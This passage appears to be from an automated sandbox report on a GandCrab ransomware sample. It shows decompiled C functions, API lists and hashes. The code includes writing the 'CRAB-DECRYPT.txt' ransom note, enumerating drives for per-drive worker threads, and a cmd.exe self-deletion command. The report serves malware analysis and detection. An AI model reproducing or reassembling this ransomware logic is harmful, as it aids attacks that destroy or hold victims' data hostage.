                                    • InternetCloseHandle.WININET(0F58581B), ref: 0F585657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
                                    • String ID: POST$popkadurak
                                    • API String ID: 2554059081-2707760125
                                    • Opcode ID: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
                                    • Instruction ID: 7427cf842f480294e08547429d7791379471136cf6f5da861cba3b359e4b6d84
                                    • Opcode Fuzzy Hash: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
                                    • Instruction Fuzzy Hash: 7D41C671E0030AE6EB10AFA9DD41FED7F79FF88721F141125EA40B2241EB78564ACB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E0F5872A0(intOrPtr* __ecx) {
                                    				int _t42;
                                    				int _t48;
                                    				int _t51;
                                    				int _t54;
                                    				int _t57;
                                    				int _t60;
                                    				int _t63;
                                    				int _t66;
                                    				int _t70;
                                    				int _t72;
                                    				void* _t75;
                                    				intOrPtr* _t86;
                                    				int _t88;
                                    				int _t89;
                                    				int _t90;
                                    				int _t91;
                                    				int _t92;
                                    				int _t93;
                                    				int _t94;
                                    				void* _t95;
                                    
                                    				_t40 = lstrlenW;
                                    				_t86 = __ecx;
                                    				_t75 = 0;
                                    				if( *__ecx != 0) {
                                    					_t72 = lstrlenW( *(__ecx + 8));
                                    					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                    					_t40 = lstrlenW;
                                    					_t75 = _t3 + _t72;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                    					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                    					_t70 = lstrlenW( *(_t86 + 0x10));
                                    					_t7 = _t95 + 4; // 0x4
                                    					_t75 = _t7 + _t70 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                    					_t94 = lstrlenW( *(_t86 + 0x20));
                                    					_t66 = lstrlenW( *(_t86 + 0x1c));
                                    					_t11 = _t94 + 4; // 0x4
                                    					_t75 = _t11 + _t66 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                    					_t93 = lstrlenW( *(_t86 + 0x2c));
                                    					_t63 = lstrlenW( *(_t86 + 0x28));
                                    					_t15 = _t93 + 4; // 0x4
                                    					_t75 = _t15 + _t63 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                    					_t92 = lstrlenW( *(_t86 + 0x38));
                                    					_t60 = lstrlenW( *(_t86 + 0x34));
                                    					_t19 = _t92 + 4; // 0x4
                                    					_t75 = _t19 + _t60 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                    					_t91 = lstrlenW( *(_t86 + 0x44));
                                    					_t57 = lstrlenW( *(_t86 + 0x40));
                                    					_t23 = _t91 + 4; // 0x4
                                    					_t75 = _t23 + _t57 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                    					_t90 = lstrlenW( *(_t86 + 0x50));
                                    					_t54 = lstrlenW( *(_t86 + 0x4c));
                                    					_t27 = _t90 + 4; // 0x4
                                    					_t75 = _t27 + _t54 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                    					_t89 = lstrlenW( *(_t86 + 0x5c));
                                    					_t51 = lstrlenW( *(_t86 + 0x58));
                                    					_t31 = _t89 + 4; // 0x4
                                    					_t75 = _t31 + _t51 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                    					_t75 = _t75 + 0x14;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                    					_t88 = lstrlenW( *(_t86 + 0x7c));
                                    					_t48 = lstrlenW( *(_t86 + 0x78));
                                    					_t36 = _t88 + 4; // 0x4
                                    					_t75 = _t36 + _t48 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                    					return _t75;
                                    				} else {
                                    					_t42 = lstrlenW( *(_t86 + 0x88));
                                    					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                    				}
                                    			}























                                    0x0f5872a0
                                    0x0f5872a8
                                    0x0f5872aa
                                    0x0f5872ae
                                    0x0f5872b3
                                    0x0f5872c1
                                    0x0f5872c4
                                    0x0f5872c9
                                    0x0f5872c9
                                    0x0f5872cf
                                    0x0f5872d9
                                    0x0f5872e0
                                    0x0f5872e4
                                    0x0f5872e7
                                    0x0f5872e7
                                    0x0f5872ed
                                    0x0f5872fb
                                    0x0f5872fd
                                    0x0f587305
                                    0x0f587308
                                    0x0f587308
                                    0x0f58730e
                                    0x0f58731c
                                    0x0f58731e
                                    0x0f587326
                                    0x0f587329
                                    0x0f587329
                                    0x0f58732f
                                    0x0f58733d
                                    0x0f58733f
                                    0x0f587347
                                    0x0f58734a
                                    0x0f58734a
                                    0x0f587350
                                    0x0f58735e
                                    0x0f587360
                                    0x0f587368
                                    0x0f58736b
                                    0x0f58736b
                                    0x0f587371
                                    0x0f58737f
                                    0x0f587381
                                    0x0f587389
                                    0x0f58738c
                                    0x0f58738c
                                    0x0f587392
                                    0x0f5873a0
                                    0x0f5873a2
                                    0x0f5873aa
                                    0x0f5873ad
                                    0x0f5873ad
                                    0x0f5873b3
                                    0x0f5873b5
                                    0x0f5873b5
                                    0x0f5873bc
                                    0x0f5873ca
                                    0x0f5873cc
                                    0x0f5873d4
                                    0x0f5873d7
                                    0x0f5873d7
                                    0x0f5873e0
                                    0x0f58740c
                                    0x0f5873e2
                                    0x0f5873e8
                                    0x0f587406
                                    0x0f587406

                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                    • lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873E8
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873F6
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID:
                                    • API String ID: 1659193697-0
                                    • Opcode ID: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
                                    • Instruction ID: 5e1af2344e6d4b3c2a48226344ad4df0a39555e05da5ee398a47357ec6d8bdd6
                                    • Opcode Fuzzy Hash: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
                                    • Instruction Fuzzy Hash: 5F412232100612FFD7115FA8EE8C794BBA1FF08316F185535E416B2621D779B47AEB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0F585F00(void* __ecx, intOrPtr __edx, void* __esi) {
                                    				CHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v267;
                                    				char _v268;
                                    				CHAR* _t10;
                                    				struct HINSTANCE__* _t13;
                                    				_Unknown_base(*)()* _t20;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t35;
                                    
                                    				_t10 =  *0xf592a78; // 0x0
                                    				_v12 = __edx;
                                    				_t24 = __ecx;
                                    				_v8 = _t10;
                                    				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
                                    				if(_t31 != 0) {
                                    					_t13 = GetModuleHandleA("ntdll.dll");
                                    					if(_t13 != 0) {
                                    						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
                                    						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
                                    						_t35 = _t35 + 0xc;
                                    					}
                                    					_v268 = 0;
                                    					E0F589170( &_v267, 0, 0xff);
                                    					E0F585DC0( &_v268, _t31, lstrlenA(_t31));
                                    					E0F585E70( &_v268, _t24, _v12);
                                    					VirtualFree(_t31, 0, 0x8000);
                                    				}
                                    				return _t24;
                                    			}













                                    0x0f585f09
                                    0x0f585f1b
                                    0x0f585f1e
                                    0x0f585f20
                                    0x0f585f29
                                    0x0f585f2d
                                    0x0f585f38
                                    0x0f585f40
                                    0x0f585f49
                                    0x0f585f6c
                                    0x0f585f72
                                    0x0f585f75
                                    0x0f585f81
                                    0x0f585f8b
                                    0x0f585fa3
                                    0x0f585fb3
                                    0x0f585fc3
                                    0x0f585fc3
                                    0x0f585fd0

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F585F23
                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F585F38
                                    • GetProcAddress.KERNEL32(00000000,RtlComputeCrc32,772966A0), ref: 0F585F49
                                    • lstrlenA.KERNEL32(00000000), ref: 0F585F54
                                    • wsprintfA.USER32 ref: 0F585F6C
                                    • _memset.LIBCMT ref: 0F585F8B
                                    • lstrlenA.KERNEL32(00000000), ref: 0F585F94
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585FC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
                                    • String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
                                    • API String ID: 218840185-1387466253
                                    • Opcode ID: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
                                    • Instruction ID: 385a465960556f8941655574efeaa2c36689c4abeb750ef906f7080a655123ff
                                    • Opcode Fuzzy Hash: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
                                    • Instruction Fuzzy Hash: 3B113435E44304BBD7206B68ED49FAE7F78BB44B21F040075F905F2281EBB85A57AA51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F586D40(void* __ecx) {
                                    				long _v8;
                                    				WCHAR* _t7;
                                    				signed int _t16;
                                    				void* _t21;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                    				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
                                    				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                    				if(_t22 != 0xffffffff) {
                                    					_t7 =  *0xf592a64; // 0xf592000
                                    					if(_t7 != 0) {
                                    						WriteFile(_t22,  *0xf592a64, lstrlenW(_t7) + _t11,  &_v8, 0);
                                    					}
                                    					CloseHandle(_t22);
                                    					_t16 = 1;
                                    				} else {
                                    					_t16 = 0 | GetLastError() == 0x000000b7;
                                    				}
                                    				VirtualFree(_t25, 0, 0x8000);
                                    				return _t16;
                                    			}









                                    0x0f586d5b
                                    0x0f586d63
                                    0x0f586d85
                                    0x0f586d8a
                                    0x0f586d9e
                                    0x0f586da5
                                    0x0f586dbe
                                    0x0f586dbe
                                    0x0f586dc5
                                    0x0f586dcb
                                    0x0f586d8c
                                    0x0f586d99
                                    0x0f586d99
                                    0x0f586dd8
                                    0x0f586de6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F586E22,00000000,?,?), ref: 0F586D55
                                    • wsprintfW.USER32 ref: 0F586D63
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F586D7F
                                    • GetLastError.KERNEL32(?,?), ref: 0F586D8C
                                    • lstrlenW.KERNEL32(0F592000,?,00000000,?,?), ref: 0F586DAE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F586DBE
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 0F586DC5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586DD8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                    • String ID: %s\CRAB-DECRYPT.txt
                                    • API String ID: 2985722263-2724392667
                                    • Opcode ID: c9123096018abbb3d8c8dcb90d20ba123dd4e7a94fb0e55db0336575ac45390d
                                    • Instruction ID: 581344171a8934cd9380a76f16cba41b138bad6181c07b35ff77a8186af11899
                                    • Opcode Fuzzy Hash: c9123096018abbb3d8c8dcb90d20ba123dd4e7a94fb0e55db0336575ac45390d
                                    • Instruction Fuzzy Hash: 3001B9753413007BF3201B64AE8AF6A3F5CEB45B26F100121FB05F52C1D7ED692B9669
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F585350() {
                                    				WCHAR* _t6;
                                    				short* _t8;
                                    
                                    				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				if(_t6 != 0) {
                                    					GetModuleFileNameW(0, _t6, 0x200);
                                    					if(_t8 != 0) {
                                    						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                    						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}





                                    0x0f585376
                                    0x0f58537a
                                    0x0f58537e
                                    0x0f585388
                                    0x0f585390
                                    0x0f585399
                                    0x0f5853b3
                                    0x0f5853b3
                                    0x0f585390
                                    0x0f5853bb

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F5854E9,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000), ref: 0F585366
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585378
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585388
                                    • wsprintfW.USER32 ref: 0F585399
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F5853B3
                                    • ExitProcess.KERNEL32 ref: 0F5853BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                    • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                    • API String ID: 4033023619-516011104
                                    • Opcode ID: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
                                    • Instruction ID: e09e45b48663f837c3e9811199cf4d778e08a4ffb85ac4991b933953e111c7fa
                                    • Opcode Fuzzy Hash: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
                                    • Instruction Fuzzy Hash: D6F01C317C231033F12126645D0BF0B2E59AB89F32F280016B704BE2C29AE8641786A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F582C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                    				struct tagPAINTSTRUCT _v68;
                                    				struct tagPAINTSTRUCT _v88;
                                    				short _v100;
                                    				intOrPtr _t13;
                                    				void* _t15;
                                    				struct HDC__* _t21;
                                    				int _t30;
                                    
                                    				_t13 =  *0xf58f290; // 0x21
                                    				asm("movdqu xmm0, [0xf58f280]");
                                    				_t30 = _a8;
                                    				_v88.fErase = _t13;
                                    				asm("movdqu [esp+0x10], xmm0");
                                    				_t15 = _t30 - 2;
                                    				if(_t15 == 0) {
                                    					CreateThread(0, 0, E0F582AD0, 0, 0, 0);
                                    					DestroyWindow(_a4);
                                    					return 0xdeadbeef;
                                    				} else {
                                    					if(_t15 == 0xd) {
                                    						_t21 = BeginPaint(_a4,  &_v68);
                                    						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                    						EndPaint(_a4,  &_v88);
                                    						return 0;
                                    					} else {
                                    						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                    					}
                                    				}
                                    			}










                                    0x0f582c59
                                    0x0f582c5e
                                    0x0f582c66
                                    0x0f582c69
                                    0x0f582c70
                                    0x0f582c76
                                    0x0f582c79
                                    0x0f582ce9
                                    0x0f582cf2
                                    0x0f582d01
                                    0x0f582c7b
                                    0x0f582c7e
                                    0x0f582c9f
                                    0x0f582cbd
                                    0x0f582ccb
                                    0x0f582cd7
                                    0x0f582c80
                                    0x0f582c94
                                    0x0f582c94
                                    0x0f582c7e

                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0F582C8A
                                    • BeginPaint.USER32(?,?), ref: 0F582C9F
                                    • lstrlenW.KERNEL32(?), ref: 0F582CAC
                                    • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F582CBD
                                    • EndPaint.USER32(?,?), ref: 0F582CCB
                                    • CreateThread.KERNEL32 ref: 0F582CE9
                                    • DestroyWindow.USER32(?), ref: 0F582CF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                    • String ID: GandCrab!
                                    • API String ID: 572880375-2223329875
                                    • Opcode ID: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
                                    • Instruction ID: 7dd70b9b9c76b731d7425979708289aed013986bcc28d5dceecaf99a43ece8a4
                                    • Opcode Fuzzy Hash: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
                                    • Instruction Fuzzy Hash: 11119332104209BFD711DF54DD0AFBA7FA8FB48722F001616FD41E5290E7759526EB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F583FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                    				char _v612;
                                    				char _v644;
                                    				void* _v908;
                                    				void* _v912;
                                    				intOrPtr _v916;
                                    				intOrPtr _v920;
                                    				short _v924;
                                    				signed int _v928;
                                    				void* _v932;
                                    				void* _v936;
                                    				intOrPtr _v940;
                                    				intOrPtr _v944;
                                    				intOrPtr _v948;
                                    				long _v952;
                                    				struct _SECURITY_ATTRIBUTES* _v956;
                                    				struct _SECURITY_ATTRIBUTES* _v960;
                                    				struct _SECURITY_ATTRIBUTES* _v964;
                                    				char _v968;
                                    				void* _t67;
                                    				short _t68;
                                    				intOrPtr _t69;
                                    				int _t72;
                                    				long _t75;
                                    				signed int _t77;
                                    				signed int _t80;
                                    				intOrPtr* _t82;
                                    				void* _t84;
                                    				struct _SECURITY_ATTRIBUTES* _t87;
                                    				long _t88;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t95;
                                    				char _t101;
                                    				intOrPtr _t106;
                                    				void _t110;
                                    				struct _SECURITY_ATTRIBUTES** _t114;
                                    				intOrPtr _t115;
                                    				signed int _t119;
                                    				void* _t121;
                                    
                                    				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                    				_t87 = __ecx;
                                    				_v964 = __ecx;
                                    				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                    				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                    				_t88 = 0;
                                    				 *_t67 = 0x43;
                                    				_t68 =  *L"?:\\"; // 0x3a003f
                                    				_v924 = _t68;
                                    				_t69 =  *0xf58f350; // 0x5c
                                    				_v920 = _t69;
                                    				_v968 = GetTickCount();
                                    				_t114 =  &_v644;
                                    				_t110 = 0x41;
                                    				do {
                                    					_v924 = _t110;
                                    					_t72 = GetDriveTypeW( &_v924);
                                    					if(_t72 >= 2 && _t72 != 5) {
                                    						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                    						_t84 = _t114 - 8;
                                    						 *_t84 = _t110;
                                    						 *_t114 = 0;
                                    						_t114[2] = 0;
                                    						_t114[3] = 0;
                                    						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F586F40, _t84, 0, 0);
                                    						_t88 = _t88 + 1;
                                    						_t114 =  &(_t114[6]);
                                    					}
                                    					_t110 = _t110 + 1;
                                    				} while (_t110 <= 0x5a);
                                    				_v952 = _t88;
                                    				asm("xorps xmm0, xmm0");
                                    				_v956 = 0;
                                    				_v960 = 0;
                                    				asm("movlpd [esp+0x38], xmm0");
                                    				asm("movlpd [esp+0x30], xmm0");
                                    				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                    				_t75 = GetTickCount();
                                    				asm("xorps xmm0, xmm0");
                                    				_t115 = _v948;
                                    				_v932 = _t75 - _v968;
                                    				_t77 = 0;
                                    				_v964 = 0;
                                    				asm("movlpd [esp+0x40], xmm0");
                                    				if(_t88 < 2) {
                                    					_t95 = _v940;
                                    					_t106 = _v944;
                                    				} else {
                                    					_t26 = _t88 - 2; // -1
                                    					_t92 = _v940;
                                    					_t82 =  &_v612;
                                    					_t101 = (_t26 >> 1) + 1;
                                    					_v968 = _t101;
                                    					_v928 = _t101 + _t101;
                                    					_t106 = _v944;
                                    					do {
                                    						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                    						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                    						asm("adc edi, [eax-0x14]");
                                    						_t115 = _t115 +  *_t82;
                                    						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                    						asm("adc edx, [eax+0x4]");
                                    						_t82 = _t82 + 0x30;
                                    						_t41 =  &_v968;
                                    						 *_t41 = _v968 - 1;
                                    					} while ( *_t41 != 0);
                                    					_t77 = _v928;
                                    					_v968 = _t92;
                                    					_t88 = _v952;
                                    					_t95 = _v968;
                                    				}
                                    				if(_t77 >= _t88) {
                                    					_t89 = _v916;
                                    				} else {
                                    					_t80 = _t77 + _t77 * 2;
                                    					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                    					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                    				}
                                    				asm("adc edx, edi");
                                    				asm("adc edx, eax");
                                    				return E0F585670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                    			}










































                                    0x0f583ff6
                                    0x0f584008
                                    0x0f58400c
                                    0x0f584010
                                    0x0f58401b
                                    0x0f58401e
                                    0x0f584020
                                    0x0f584023
                                    0x0f584028
                                    0x0f58402c
                                    0x0f584031
                                    0x0f58403b
                                    0x0f58403f
                                    0x0f584046
                                    0x0f584050
                                    0x0f584054
                                    0x0f58405a
                                    0x0f584063
                                    0x0f584072
                                    0x0f584075
                                    0x0f584082
                                    0x0f584085
                                    0x0f58408b
                                    0x0f584092
                                    0x0f58409f
                                    0x0f5840a3
                                    0x0f5840a4
                                    0x0f5840a4
                                    0x0f5840a7
                                    0x0f5840a8
                                    0x0f5840b6
                                    0x0f5840ba
                                    0x0f5840bd
                                    0x0f5840c7
                                    0x0f5840cf
                                    0x0f5840d5
                                    0x0f5840db
                                    0x0f5840e1
                                    0x0f5840eb
                                    0x0f5840f2
                                    0x0f5840f6
                                    0x0f5840fa
                                    0x0f5840fc
                                    0x0f584104
                                    0x0f58410d
                                    0x0f58416c
                                    0x0f584170
                                    0x0f58410f
                                    0x0f58410f
                                    0x0f584112
                                    0x0f584118
                                    0x0f58411f
                                    0x0f584120
                                    0x0f584127
                                    0x0f58412b
                                    0x0f584130
                                    0x0f584137
                                    0x0f58413a
                                    0x0f58413e
                                    0x0f584148
                                    0x0f58414a
                                    0x0f58414e
                                    0x0f584151
                                    0x0f584154
                                    0x0f584154
                                    0x0f584154
                                    0x0f58415a
                                    0x0f58415e
                                    0x0f584162
                                    0x0f584166
                                    0x0f584166
                                    0x0f584176
                                    0x0f58419a
                                    0x0f584178
                                    0x0f584178
                                    0x0f584182
                                    0x0f584186
                                    0x0f58418d
                                    0x0f5841a4
                                    0x0f5841a8
                                    0x0f5841c6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F584010
                                    • GetTickCount.KERNEL32 ref: 0F584035
                                    • GetDriveTypeW.KERNEL32(?), ref: 0F58405A
